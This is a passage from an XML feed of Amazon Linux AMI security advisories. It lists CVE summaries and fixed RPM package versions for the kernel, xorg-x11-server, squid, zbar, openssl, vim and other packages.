for kernel</title><issued date="2023-11-10 17:32:00" /><updated date="2024-04-11 01:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5717:
A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.
If perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.
We recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.
CVE-2023-42754:
A NULL pointer dereference flaw was found in the Linux kernel ipv4 stack. The socket buffer (skb) was assumed to be associated with a device before calling __ip_options_compile, which is not always the case if the skb is re-routed by ipvs. This issue may allow a local user with CAP_NET_ADMIN privileges to crash the system.
CVE-2023-34324:
A flaw in the kernel Xen event handler can cause a deadlock with Xen console handling in unprivileged Xen guests.
CVE-2023-3397:
A race condition between two functions, lmLogClose() and txEnd(), in the Linux kernel's JFS filesystem can lead to a use-after-free vulnerability and crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3397" title="" id="CVE-2023-3397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34324" title="" id="CVE-2023-34324" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42754" title="" id="CVE-2023-42754" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5717" title="" id="CVE-2023-5717" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.328-174.540.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.328" 
release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.328-174.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.328" release="174.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.328-174.540.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1884</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1884: important priority package update for xorg-x11-server</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5380:
A use-after-free flaw was found in the xorg-x11-server. An X server crash may occur in a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode) if the pointer is warped from within a window on one screen to the root window of the other screen and if the original window is destroyed followed by another window being destroyed.
CVE-2023-5367:
An out-of-bounds write flaw was found in the xorg-x11-server. This issue occurs due to an incorrect calculation of a buffer offset when copying data stored in the heap in the XIChangeDeviceProperty function in Xi/xiproperty.c and in the RRChangeOutputProperty function in randr/rrproperty.c, allowing for possible escalation of privileges or denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5367" title="" id="CVE-2023-5367" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5380" title="" id="CVE-2023-5380" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.52.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.52.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.52.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.52.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.52.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.52.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1885</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1885: important priority package update for squid</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46728:
Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to a NULL pointer dereference bug, Squid is vulnerable to a Denial of Service attack against Squid's Gopher gateway. The gopher protocol is always available and enabled in Squid prior to Squid 6.0.1. Responses that trigger this bug can be received from any gopher server, even one without malicious intent. Gopher support has been removed in Squid version 6.0.1. Users are advised to upgrade. Users unable to upgrade should reject all gopher URL requests.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46728" title="" id="CVE-2023-46728" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.51.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.51.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.51.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.51.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.51.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.51.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.51.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.51.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.51.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.51.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.51.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1886</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1886: important priority package update for squid</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46724:
Squid is a caching proxy for the Web. Due to an Improper Validation of Specified Index bug, Squid versions 3.3.0.1 through 5.9 and 6.0 prior to 6.4 compiled using `--with-openssl` are vulnerable to a Denial of Service attack against SSL Certificate validation. This problem allows a remote server to perform Denial of Service against Squid Proxy by initiating a TLS Handshake with a specially crafted SSL Certificate in a server certificate chain. This attack is limited to HTTPS and SSL-Bump. This bug is fixed in Squid version 6.4. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. Those who use a prepackaged version of Squid should refer to the package vendor for availability information on updated packages.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46724" title="" id="CVE-2023-46724" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="17.52.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.52.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.52.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.52.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.52.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.52.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.52.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.52.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.52.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.52.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.52.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1887</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1887: medium priority package update for zbar</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-40890:
A stack-based buffer overflow vulnerability exists in the lookup_sequence function of ZBar 0.23.90. Specially crafted QR codes may lead to information disclosure and/or arbitrary code execution. To trigger this vulnerability, an attacker can digitally input the malicious QR code, or prepare it to be physically scanned by the vulnerable scanner.
CVE-2023-40889:
A heap-based buffer overflow exists in the qr_reader_match_centers function of ZBar 0.23.90. Specially crafted QR codes may lead to information disclosure and/or arbitrary code execution. To trigger this vulnerability, an attacker can digitally input the malicious QR code, or prepare it to be physically scanned by the vulnerable scanner.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40889" title="" id="CVE-2023-40889" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40890" title="" id="CVE-2023-40890" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="zbar" version="0.10" release="19.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/zbar-0.10-19.3.amzn1.x86_64.rpm</filename></package><package name="zbar-debuginfo" version="0.10" release="19.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/zbar-debuginfo-0.10-19.3.amzn1.x86_64.rpm</filename></package><package name="zbar-devel" version="0.10" release="19.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/zbar-devel-0.10-19.3.amzn1.x86_64.rpm</filename></package><package name="zbar-devel" version="0.10" release="19.3.amzn1" epoch="0" arch="i686"><filename>Packages/zbar-devel-0.10-19.3.amzn1.i686.rpm</filename></package><package name="zbar-debuginfo" version="0.10" release="19.3.amzn1" epoch="0" arch="i686"><filename>Packages/zbar-debuginfo-0.10-19.3.amzn1.i686.rpm</filename></package><package name="zbar" version="0.10" release="19.3.amzn1" epoch="0" arch="i686"><filename>Packages/zbar-0.10-19.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1888</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1888: low priority package update for containerd</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:27:00" /><severity>low</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd" version="1.4.13" release="6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.13-6.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" 
version="1.4.13" release="6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.13-6.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.13" release="6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.13-6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1889</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1889: medium priority package update for amazon-efs-utils</title><issued date="2023-11-10 17:32:00" /><updated date="2023-11-15 23:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-46174:
efs-utils is a set of utilities for Amazon Elastic File System (EFS). A potential race condition issue exists within the Amazon EFS mount helper in efs-utils versions v1.34.3 and below. When using TLS to mount file systems, the mount helper allocates a local port for stunnel to receive NFS connections prior to applying the TLS tunnel. In affected versions, concurrent mount operations can allocate the same local port, leading to either failed mount operations or an inappropriate mapping from an EFS customer's local mount points to that customer's EFS file systems. This issue is patched in version v1.34.4. There is no recommended workaround. We recommend affected users update the installed version of efs-utils to v1.34.4 or later.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46174" title="" id="CVE-2022-46174" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-efs-utils" version="1.35.0" release="1.amzn1" epoch="0" arch="noarch"><filename>Packages/amazon-efs-utils-1.35.0-1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1890</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1890: important priority package update for microcode_ctl</title><issued date="2023-11-10 20:56:00" /><updated date="2023-11-15 23:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-23583:
An issue was found in redundant REX instruction prefix values affecting third generation Intel Xeon Scalable ("Icelake") processors. The issue may allow a local third-party actor using such instructions to cause a denial of service (DoS) or achieve privilege escalation. CVE-2023-23583 only affects Amazon Linux customers on EC2 metal platforms. Please refer to the AWS Security Bulletin for more information on the affected instance families and the impacts on AWS services: (https://aws.amazon.com/security/security-bulletins/AWS-2023-013). (CVE-2023-23583)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23583" title="" id="CVE-2023-23583" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl" version="2.1" release="47.42.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.42.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.42.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.42.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.42.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.42.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.42.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1891</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1891: medium priority package update for openssl</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5678:
Issue summary: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow.
Impact summary: Applications that use the function DH_generate_key() to generate an X9.42 DH key may experience long delays. Likewise, applications that use DH_check_pub_key(), DH_check_pub_key_ex() or EVP_PKEY_public_check() to check an X9.42 DH key or X9.42 DH parameters may experience long delays. Where the key or parameters that are being checked have been obtained from an untrusted source, this may lead to a Denial of Service.
While DH_check() performs all the necessary checks (as of CVE-2023-3817), DH_check_pub_key() doesn't make any of these checks, and is therefore vulnerable to excessively large P and Q parameters. Likewise, while DH_generate_key() performs a check for an excessively large P, it doesn't check for an excessively large Q.
An application that calls DH_generate_key() or DH_check_pub_key() and supplies a key or parameters obtained from an untrusted source could be vulnerable to a Denial of Service attack.
DH_generate_key() and DH_check_pub_key() are also called by a number of other OpenSSL functions. An application calling any of those other functions may similarly be affected. The other functions affected by this are DH_check_pub_key_ex(), EVP_PKEY_public_check(), and EVP_PKEY_generate(). Also vulnerable are the OpenSSL pkey command line application when using the "-pubcheck" option, as well as the OpenSSL genpkey command line application.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5678" title="" id="CVE-2023-5678" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.165.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.165.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.165.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.165.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.165.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.165.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.165.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.165.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1892</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1892: important priority package update for xorg-x11-server</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5574:
A use-after-free flaw was found in xorg-x11-server-Xvfb. This issue occurs in Xvfb with a very specific and legacy configuration (a multi-screen setup with multiple protocol screens, also known as Zaphod mode). If the pointer is warped from screen 1 to screen 0, a use-after-free issue may be triggered during shutdown or reset of the Xvfb server, allowing for possible escalation of privileges or denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5574" title="" id="CVE-2023-5574" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.53.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.53.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.53.amzn1.x86_64.rpm</filename></package><package 
name="xorg-x11-server-common" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.53.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.53.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1893</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1893: medium priority package update for vim</title><issued date="2023-11-29 23:18:00" /><updated date="2023-12-04 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-5535:
Use After Free in GitHub repository vim/vim prior to v9.0.2010.
CVE-2023-5441:
NULL Pointer Dereference in GitHub repository vim/vim prior to 20d161ace307e28690229b68584f2d84556f8960.
CVE-2023-5344:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1969.
CVE-2023-46246:
Vim is an improved version of the good old UNIX editor Vi. Heap-use-after-free in memory allocated in the function `ga_grow_inner` in the file `src/alloc.c` at line 748, which is freed in the file `src/ex_docmd.c` in the function `do_cmdline` at line 1010 and then used again in `src/cmdhist.c` at line 759. When using the `:history` command, it's possible that the provided argument overflows the accepted value, causing an integer overflow and potentially later a use-after-free. This vulnerability has been patched in version 9.0.2068.
